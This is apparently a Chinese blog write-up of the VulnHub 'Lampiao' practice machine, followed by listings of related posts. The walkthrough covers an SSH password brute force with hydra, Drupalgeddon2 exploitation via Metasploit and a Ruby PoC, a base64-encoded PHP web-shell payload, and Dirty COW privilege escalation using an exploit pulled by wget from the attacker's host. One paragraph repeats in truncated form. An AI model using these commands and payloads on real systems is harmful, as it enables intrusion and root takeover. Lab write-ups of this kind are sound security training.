2-Lampiao

最新推荐文章于 2025-04-25 16:45:58 发布
最新推荐文章于 2025-04-25 16:45:58 发布
阅读量430 收藏 8
点赞数 4
分类专栏: 靶场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/peng05/article/details/145403973
版权

Lampiao

该文章参考大余每日一攻防

1.nmap信息收集

└─$ nmap  192.168.225.138 -p-
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port

2.网页信息枚举?q=node/2发现audio.m4a获得用户名

3.御剑遍历目录

在robots.txt中的CHANGELOG.txt文件发现cns版本为Drupal 7.54。

4.获得密码字典

使用 cewl http://192.168.225.138:1898/?q=node/1 -w lampiao.txt

5.hydra爆破获得密码

hydra -l tiago -P lampiao.txt 192.168.225.138 ssh
host: 192.168.225.138 login: tiago password: Virgulino

6.登录后发现低权限

ssh tiago@192.168.225.138

7.mfs-getshell

搜索关于Drupal 7.54 的利用
msfconsole
search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.225.138
set rpost 1898
run
shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’

8.脏牛漏洞提权

searchsploit dirty
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/Desktop
主机搭建 :python3 -m http.server 8081
靶机下载 :wget http://192.168.225.129:8081/40847.cpp
编译执行:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirty 40847.cpp -lutil
获得密码:Root password is: dirtyCowFun
登录cat ./flag.txt 获得密码:9740616875908d91ddcdaa8aea3af366

9.xray扫描结果获得poc、

给出了两个poc链接,下载后安装执行

sudo gem install highline
./drupalgeddon2.rb http://10.211.55.9:1898/

{
  "create_time": 1737269816952,
  "detail": {
    "addr": "http://192.168.225.138:1898/",
    "payload": "",
    "extra": {
      "links": [
        "https://github.com/dreadlocked/Drupalgeddon2", poc链接
        "https://paper.seebug.org/567/"
      ],
      "param": {}
    }
  },
  "plugin": "poc-yaml-drupal-cve-2018-7600-rce",
  "target": {
    "url": "http://192.168.225.138:1898/"
  },
  "id": 0
}

通过base64方法上传shell.php成功获得shell!

*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------

10.漏洞总结

CVE-2018-7600
Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。
Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。


CVE-2016-5195 脏牛漏洞
Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。

.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。
``

Vulnhub-Lampiao 靶机渗透
Majula
01-30 2490
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
VulnHub--Lampiao-linux脏牛漏洞提权
记录笔记
07-06 1140
vulnhub-靶场--lampiao
vulnhub-Lampiao靶机的测试报告
ccc_9wy的博客
09-30 1200
学习渗透测试流程,渗透lampiao靶机;msfconsole;searchspoilt;drupal 7漏洞getshell;drupal_geddon2;Linux内核提权;脏牛漏洞提权(dirty cow);上传exp;g++
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
bmxch的博客
05-05 647
前言:我们上个笔记是常规收集可用信息,爆破拿到ssh账户提权得到root的shell这次我们用框架来尝试两种不同方法拿到shell思路清晰,先说步骤1.信息收集得到可以用的站点漏洞2.通过AWVS+xray或xray和bs解析出目录报告,得到我们能利用exp或poc,当然因为AWVS爬虫功能并不免费,所以最好联动,也可以和其他工具联动,思想是自动化的思想,得到可以利用的框架漏洞。3.得到可以用的poc或exp直接利用提权,如果又cve更好。
VulnHub - Lampiao
qq_46081990的博客
03-13 497
得知系统为Ubuntu 14.04,内核版本为4.4.0,检测到[CVE-2016-5195] dirtycow,并给出了EXP下载地址,我这里用的EXP是另外从EXP监控项目里找的。DirSearch扫描网站目录,发现/CHANGELOG.txt等多个敏感文件和目录,其内容显示Drupal版本为7.54。上传dcow.cpp至目标主机/tmp目录下,c++编译为目标文件dcow,python切换为pty环境执行dcow。Wappalyzer显示CMS为Drupal 7,编程语言为PHP。
VulnHub靶场-Lampiao
weixin_48972359的博客
04-29 830
靶机:Lampiao靶机中只有一个存放在root家目录中的flag。
2-Lampiao靶机
Lpyzdzs的博客
10-16 628
Lampiao靶机
VulnHub-Lampiao-靶机渗透学习
嗯嗯呐的博客
11-04 837
靶机地址:https://www.vulnhub.com/entry/lampi 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 一、 信息采集 开始我们的操作。 使用nmap扫描,确认靶机IP地址 扫描靶机端口,看看主机上有那个服务 字典生成工具 cewl cewl是一个ruby开发的应用程序,你可以给它的爬虫指定url的指定深度还可以添加额外的外部连接,接下来cewl会给你返回一个字典文件。 默认方法: 输入下列命令之后,爬虫会根据指定的url和深度进行爬取,然后打印可用于密码破
2-VulnHub-Lampiao
尼德霍格007
07-07 182
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-7 一、信息收集 我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址: 可以看到目标机开放了以下几个端口 尝试ssh弱口令爆破,然鹅并没有获得有用的信息 试着访问一下80端口 好图!!! 搜索一通下来,并没有发现有用的东西 试试1898端口,是Apache的http服务,主页面 第一
【vulnhub靶场系列】-Lampiao靶场(脏牛提权)
m0_62484818的博客
10-28 900
这里说一下这个爆破信息如何看,主要关注两个东西1.反回包状态码(主要注意200的状态码)2.返回包长度(主要注意与其他反回包长度不同的,或是特别大的包体),接下来继续进行攻击。编译cpp文件g++ -Wall -pedantic -O2 -std=c++11 -pthread -o xiaoli 40847.cpp -lutil。发现Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。
渗透测试-Lampiao靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-13 636
1.环境部署 靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip 攻击机:Kali 2019 靶机 : Lampiao 目标:拿下靶机root权限和里面的flag 2.信息搜集 使用arp-scan -l进行局域网主机发现,确定目标靶机IP为192.168.72.132 使用NMAP扫描目标靶机开发的端口 nmap -sS -p 1-65535 192.168.72.132 -n 发现存在一个ssh服务,和2个web服务 对两个web服务进
小白的靶机-VulnHub-Lampiao
wo41ge的博客
12-08 347
靶机地址,看这里 一、信息收集 我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址: 关于nmap的入门操作 nmap -sP 192.168.86.0/24 或者使用netdiscover获取目标IP地址 我们就拿到了这次靶机的IP地址:192.168.86.160 开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描: nmap -sS -sV -T5 -A -p- 192.168.86.160 目标计算机上
Vulnhub系列-Lampiao
Yasso的博客
01-06 3063
靶机:192.168.12.133 kali:192.168.12.128 一、信息搜集 nmap -p- -sV 192.168.12.133 访问80端口 一串乱码(没找到有用的信息) 访问1898端口 Drupal−CMS\color{red}{Drupal-CMS}Drupal−CMS http://192.168.12.133:1898/?q=node/2 audio.m4a qrc.png wget http://192.168.12.133:1898/audio.m4a wget http:
WT2000T专业录音芯片:破解普通录音设备信息留存、合规安全与远程协作三大难题
Waytronic_的博客
04-23 993
在快节奏的现代商业环境中,会议是企业决策、创意碰撞和战略部署的核心场景。然而,传统会议记录方式常面临效率低、信息遗漏、回溯困难等痛点。如何确保会议内容被精准记录并高效利用?会议室专用录音芯片应运而生,以智能化、高保真、安全便捷的特性,成为企业高效办公的“隐形助手”。
Java 24 深度解析:云原生时代的性能更新与安全重构
最新发布
qq_20294455的博客
04-25 1154
Java 24 不仅是一次版本迭代,更是 Java 平台在云原生、后量子安全和开发者生产力领域的战略布局。性能革命:通过内存优化和并发模型升级,满足超大规模系统需求。安全护航:抗量子加密技术为未来十年的信息安全提供保障。生态扩展:云原生特性巩固 Java 在分布式系统领域的统治地位。开发者关怀:语言改进和工具链升级降低开发门槛,提升效率。对于企业而言,Java 24 是构建下一代关键任务系统的必备平台;对于开发者,它是掌握前沿技术、提升竞争力的重要契机。
精准管控,安全护航 -Acrel-2000 电力监控系统助力配电房数字化升级
Acrel13611965514的博客
04-22 1005
同时,系统所采用的智能电力仪表、微机保护装置、串口服务器等常见硬件设备,以及新一代智能保护测控装置、分布式智能故障指示器等新产品,相互协作,共同为变电所的智能化运行提供了坚实的技术支撑。此外,系统还会详细记录报警事件,包括事件发生的时间、类型、相关参数等,为后续的故障分析和处理提供详尽的数据支持。Acrel-2000 系统能够通过智能电力仪表等设备,实时采集变电所内配电现场的各种电参量,如三相电压、三相电流、有功功率、无功功率、功率因数、频率等,以及开关信号,包括断路器、隔离开关的分合闸状态等。
[创业之路-381]:企业法务 - 企业经营者,有哪些生产安全风险,哪些人承担责任?承担哪些责任?如何防范?
文火冰糖(王文兵)的博客
04-22 789
企业生产安全风险涉及多个方面,需从制度、投入、培训、管理等多维度进行防范。主要负责人和安全管理人员需切实履行职责,确保安全生产。若发生事故,相关责任人需依法承担行政、民事或刑事责任。企业应树立“安全就是效益”的理念,将安全生产贯穿于生产经营全过程。
实战!银河麒麟 KYSEC 安全中心执行控制高级配置指南
鹏大圣运维
04-25 1047
在信创环境下,为了提升系统安全性,银河麒麟内置了 KYSEC 安全标签系统,通过执行控制(exectl)机制,我们可以对脚本、应用程序进行可信授权、白名单控制,防止恶意程序运行。银河麒麟操作系统的 KYSEC 安全中心提供了强大的执行控制能力,既支持图形化设置,也支持命令行批量管理,是信创场景下提升操作系统主动防护能力的重要工具。在默认配置下,当你执行一个普通脚本(例如 test.sh)时,系统会弹出安全中心的授权对话框,要求确认“是否允许执行”。就需要通过高级配置来提前授信,设置执行控制标签。
嵌入式软件测试的革新:如何用深度集成工具破解效率与安全的双重困局?
fzm5298的博客
04-22 882
某工业机器人厂商将winAMS的CSV测试集与Simulink生成的预期输出对比,发现了PID控制算法中一个累积误差未被清零的缺陷,该问题在仿真环境中因浮点精度差异始终未被察觉。或许,这就是为什么一位资深工程师在技术论坛中这样评价:“用了winAMS后,我们终于不用在深夜手动补测试用例了——它像一位沉默的搭档,默默扛起了那些重复却至关重要的工作。某国内新能源车企的测试团队反馈,通过winAMS的路径分析功能,他们发现某电机控制函数在低温条件下的一个异常分支未被覆盖,成功避免了潜在的车载控制器死机风险。
lampiao靶机安装
07-27
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的LAMP堆栈。 - 对于Ubuntu,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql ``` - 对于Kali Linux,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mariadb-server php libapache2-mod-php php-mysql ``` 3. 安装完成后,您需要下载Lampiao靶机的源代码。您可以在Lampiao的GitHub存储库上找到源代码:https://github.com/felipefacundes/lampiao 4. 解压下载的源代码包,并将其复制到Apache服务器的网页根目录下,默认情况下是`/var/www/html/`。 5. 接下来,您需要创建一个MySQL数据库并导入Lampiao的数据。进入MySQL命令行界面并执行以下命令: - 创建数据库: ``` CREATE DATABASE lampiao; ``` - 导入数据: ``` USE lampiao; SOURCE /path/to/lampiao.sql; ``` 将`/path/to/lampiao.sql`替换为实际的lampiao.sql文件路径。 6. 配置Lampiao的数据库连接。编辑Lampiao源代码中的`config.php`文件,并根据您的MySQL配置进行相应的更改。 7. 最后,启动Apache服务器并访问Lampiao靶机。在浏览器中输入服务器的IP地址或域名,您应该能够看到Lampiao的登录页面。 请注意,Lampiao是一个漏洞靶场,仅供学习和研究目的使用。在安装和使用Lampiao时,请确保您遵守当地法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值